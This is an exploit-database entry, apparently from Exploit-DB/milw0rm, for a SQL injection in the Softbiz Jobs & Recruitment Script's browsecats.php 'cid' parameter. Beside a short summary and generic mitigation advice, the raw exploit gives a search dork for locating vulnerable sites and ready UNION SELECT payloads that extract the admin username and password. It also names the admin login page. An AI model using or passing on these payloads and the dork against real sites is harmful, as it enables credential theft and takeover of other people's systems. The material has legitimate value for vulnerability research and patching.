Softbiz Jobs & Recruitment Script SQL INJECTION

vendor:

Jobs & Recruitment Script

by:

IRCRASH (Dr.Crash)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Jobs & Recruitment Script

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Softbiz Jobs & Recruitment Script SQL INJECTION

The Softbiz Jobs & Recruitment Script is vulnerable to SQL Injection. The vulnerability allows an attacker to inject malicious SQL code into the 'cid' parameter of the 'browsecats.php' script, resulting in unauthorized access to sensitive information such as usernames and passwords. The exploit code provided in the text demonstrates how to retrieve the admin username and password from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, keeping the software up to date with security patches and regularly auditing the code for vulnerabilities is essential.

Source

Exploit-DB raw data:

#####################################################################################
####              Softbiz Jobs & Recruitment Script SQL INJECTION                ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" "ALL JOBS"                                       #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Injection Adress : http://site.com/browsecats.php?cid=[sql cod]                    #
#Sql code For see user name : 999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*
#Sql code For see Password : 999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*
#                                                                                   #
#Admin panel for login : http://site.com/admin/index.php                            #
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-10-08]